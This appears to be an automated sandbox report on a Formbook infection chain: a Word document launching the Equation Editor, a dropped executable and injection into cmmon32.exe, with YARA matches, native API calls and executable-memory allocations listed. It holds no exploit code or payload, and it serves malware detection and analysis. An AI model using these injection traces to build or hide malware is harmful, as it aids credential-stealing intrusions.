Source: 00000004.00000002.427647092.00000000031D1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.505001814.0000000000240000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.449050958.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.682028966.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.456579155.0000000009A6D000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.682330562.0000000000380000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_003600F0 4_2_003600F0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_003669C9 4_2_003669C9
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_00366D30 4_2_00366D30
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_00369160 4_2_00369160
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_00369150 4_2_00369150
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_00366D21 4_2_00366D21
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_00369668 4_2_00369668
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_00369659 4_2_00369659
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_042B6788 4_2_042B6788
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_042B246B 4_2_042B246B
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_042B0048 4_2_042B0048
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 4_2_042B5BB8 4_2_042B5BB8
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041E87B 5_2_0041E87B
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00401027 5_2_00401027
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041E5E8 5_2_0041E5E8
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00409E60 5_2_00409E60
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041E606 5_2_0041E606
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041D6E7 5_2_0041D6E7
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AEE0C6 5_2_00AEE0C6
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B1D005 5_2_00B1D005
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B0905A 5_2_00B0905A
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AF3040 5_2_00AF3040
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AEE2E9 5_2_00AEE2E9
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B91238 5_2_00B91238
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AEF3CF 5_2_00AEF3CF
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B163DB 5_2_00B163DB
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AF2305 5_2_00AF2305
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B3A37B 5_2_00B3A37B
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AF7353 5_2_00AF7353
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B25485 5_2_00B25485
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B01489 5_2_00B01489
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B0C5F0 5_2_00B0C5F0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AF351F 5_2_00AF351F
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AF4680 5_2_00AF4680
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AFE6C1 5_2_00AFE6C1
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B92622 5_2_00B92622
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AFC7BC 5_2_00AFC7BC
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B7579A 5_2_00B7579A
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B257C3 5_2_00B257C3
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B8F8EE 5_2_00B8F8EE
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B1286D 5_2_00B1286D
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AFC85C 5_2_00AFC85C
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AF29B2 5_2_00AF29B2
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B9098E 5_2_00B9098E
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B069FE 5_2_00B069FE
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B75955 5_2_00B75955
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00BA3A83 5_2_00BA3A83
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B9CBA4 5_2_00B9CBA4
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B7DBDA 5_2_00B7DBDA
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AEFBD7 5_2_00AEFBD7
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B17B00 5_2_00B17B00
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B8FDDD 5_2_00B8FDDD
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B20D3B 5_2_00B20D3B
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AFCD5B 5_2_00AFCD5B
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B22E2F 5_2_00B22E2F
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00B0EE4C 5_2_00B0EE4C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021E1238 7_2_021E1238
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0213E2E9 7_2_0213E2E9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02142305 7_2_02142305
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02147353 7_2_02147353
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0218A37B 7_2_0218A37B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021663DB 7_2_021663DB
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0213F3CF 7_2_0213F3CF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0216D005 7_2_0216D005
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0215905A 7_2_0215905A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02143040 7_2_02143040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0213E0C6 7_2_0213E0C6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021E2622 7_2_021E2622
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02144680 7_2_02144680
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0214E6C1 7_2_0214E6C1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021C579A 7_2_021C579A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0214C7BC 7_2_0214C7BC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021757C3 7_2_021757C3
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02175485 7_2_02175485
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02151489 7_2_02151489
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0214351F 7_2_0214351F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0215C5F0 7_2_0215C5F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021F3A83 7_2_021F3A83
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02167B00 7_2_02167B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021ECBA4 7_2_021ECBA4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0213FBD7 7_2_0213FBD7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021CDBDA 7_2_021CDBDA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0214C85C 7_2_0214C85C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0216286D 7_2_0216286D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021DF8EE 7_2_021DF8EE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021C5955 7_2_021C5955
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021E098E 7_2_021E098E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021429B2 7_2_021429B2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021569FE 7_2_021569FE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02172E2F 7_2_02172E2F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0215EE4C 7_2_0215EE4C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02150F3F 7_2_02150F3F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0216DF7C 7_2_0216DF7C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02170D3B 7_2_02170D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0214CD5B 7_2_0214CD5B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021DFDDD 7_2_021DFDDD
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009E5E8 7_2_0009E5E8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009E606 7_2_0009E606
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009D6E7 7_2_0009D6E7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009E87B 7_2_0009E87B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_00082D90 7_2_00082D90
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_00089E60 7_2_00089E60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_00082FB0 7_2_00082FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: String function: 00B3373B appears 229 times
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: String function: 00B5F970 appears 79 times
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: String function: 00B33F92 appears 108 times
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: String function: 00AEE2A8 appears 37 times
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: String function: 00AEDF5C appears 103 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 0218373B appears 238 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 02183F92 appears 108 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 0213E2A8 appears 38 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 0213DF5C appears 107 times
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 021AF970 appears 81 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041A360 NtCreateFile, 5_2_0041A360
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041A410 NtReadFile, 5_2_0041A410
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041A490 NtClose, 5_2_0041A490
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041A540 NtAllocateVirtualMemory, 5_2_0041A540
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041A35B NtCreateFile, 5_2_0041A35B
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041A31A NtCreateFile, 5_2_0041A31A
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_0041A53A NtAllocateVirtualMemory, 5_2_0041A53A
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AE00C4 NtCreateFile,LdrInitializeThunk, 5_2_00AE00C4
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AE0078 NtResumeThread,LdrInitializeThunk, 5_2_00AE0078
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AE0048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00AE0048
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADF9F0 NtClose,LdrInitializeThunk, 5_2_00ADF9F0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADF900 NtReadFile,LdrInitializeThunk, 5_2_00ADF900
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_00ADFAE8
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_00ADFAD0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_00ADFBB8
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_00ADFB68
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_00ADFC90
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_00ADFC60
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFD8C NtDelayExecution,LdrInitializeThunk, 5_2_00ADFD8C
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_00ADFDC0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_00ADFEA0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_00ADFED0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFFB4 NtCreateSection,LdrInitializeThunk, 5_2_00ADFFB4
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AE10D0 NtOpenProcessToken, 5_2_00AE10D0
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AE0060 NtQuerySection, 5_2_00AE0060
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AE01D4 NtSetValueKey, 5_2_00AE01D4
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AE010C NtOpenDirectoryObject, 5_2_00AE010C
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AE1148 NtOpenThread, 5_2_00AE1148
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AE07AC NtCreateMutant, 5_2_00AE07AC
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADF8CC NtWaitForSingleObject, 5_2_00ADF8CC
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADF938 NtWriteFile, 5_2_00ADF938
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AE1930 NtSetContextThread, 5_2_00AE1930
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFAB8 NtQueryValueKey, 5_2_00ADFAB8
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFA20 NtQueryInformationFile, 5_2_00ADFA20
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFA50 NtEnumerateValueKey, 5_2_00ADFA50
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFBE8 NtQueryVirtualMemory, 5_2_00ADFBE8
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFB50 NtCreateKey, 5_2_00ADFB50
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFC30 NtOpenProcess, 5_2_00ADFC30
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFC48 NtSetInformationFile, 5_2_00ADFC48
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AE0C40 NtGetContextThread, 5_2_00AE0C40
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00AE1D80 NtSuspendThread, 5_2_00AE1D80
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFD5C NtEnumerateKey, 5_2_00ADFD5C
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Code function: 5_2_00ADFE24 NtWriteVirtualMemory, 5_2_00ADFE24
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021300C4 NtCreateFile,LdrInitializeThunk, 7_2_021300C4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021307AC NtCreateMutant,LdrInitializeThunk, 7_2_021307AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_0212FAB8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_0212FAD0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0212FAE8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FB50 NtCreateKey,LdrInitializeThunk, 7_2_0212FB50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0212FB68
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0212FBB8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212F900 NtReadFile,LdrInitializeThunk, 7_2_0212F900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212F9F0 NtClose,LdrInitializeThunk, 7_2_0212F9F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0212FED0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0212FFB4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0212FC60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FD8C NtDelayExecution,LdrInitializeThunk, 7_2_0212FD8C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0212FDC0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02130048 NtProtectVirtualMemory, 7_2_02130048
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02130078 NtResumeThread, 7_2_02130078
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02130060 NtQuerySection, 7_2_02130060
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021310D0 NtOpenProcessToken, 7_2_021310D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0213010C NtOpenDirectoryObject, 7_2_0213010C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02131148 NtOpenThread, 7_2_02131148
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_021301D4 NtSetValueKey, 7_2_021301D4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FA20 NtQueryInformationFile, 7_2_0212FA20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FA50 NtEnumerateValueKey, 7_2_0212FA50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FBE8 NtQueryVirtualMemory, 7_2_0212FBE8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212F8CC NtWaitForSingleObject, 7_2_0212F8CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02131930 NtSetContextThread, 7_2_02131930
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212F938 NtWriteFile, 7_2_0212F938
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FE24 NtWriteVirtualMemory, 7_2_0212FE24
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FEA0 NtReadVirtualMemory, 7_2_0212FEA0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FF34 NtQueueApcThread, 7_2_0212FF34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FFFC NtCreateProcessEx, 7_2_0212FFFC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FC30 NtOpenProcess, 7_2_0212FC30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02130C40 NtGetContextThread, 7_2_02130C40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FC48 NtSetInformationFile, 7_2_0212FC48
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FC90 NtUnmapViewOfSection, 7_2_0212FC90
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0212FD5C NtEnumerateKey, 7_2_0212FD5C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_02131D80 NtSuspendThread, 7_2_02131D80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009A360 NtCreateFile, 7_2_0009A360
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009A410 NtReadFile, 7_2_0009A410
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009A490 NtClose, 7_2_0009A490
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009A540 NtAllocateVirtualMemory, 7_2_0009A540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009A31A NtCreateFile, 7_2_0009A31A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009A35B NtCreateFile, 7_2_0009A35B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 7_2_0009A53A NtAllocateVirtualMemory, 7_2_0009A53A
PE file contains strange resources
Source: obinnazx[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: obinnamaxdw2962.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: OBL PN210700369.doc ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\obinnamaxdw2962.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
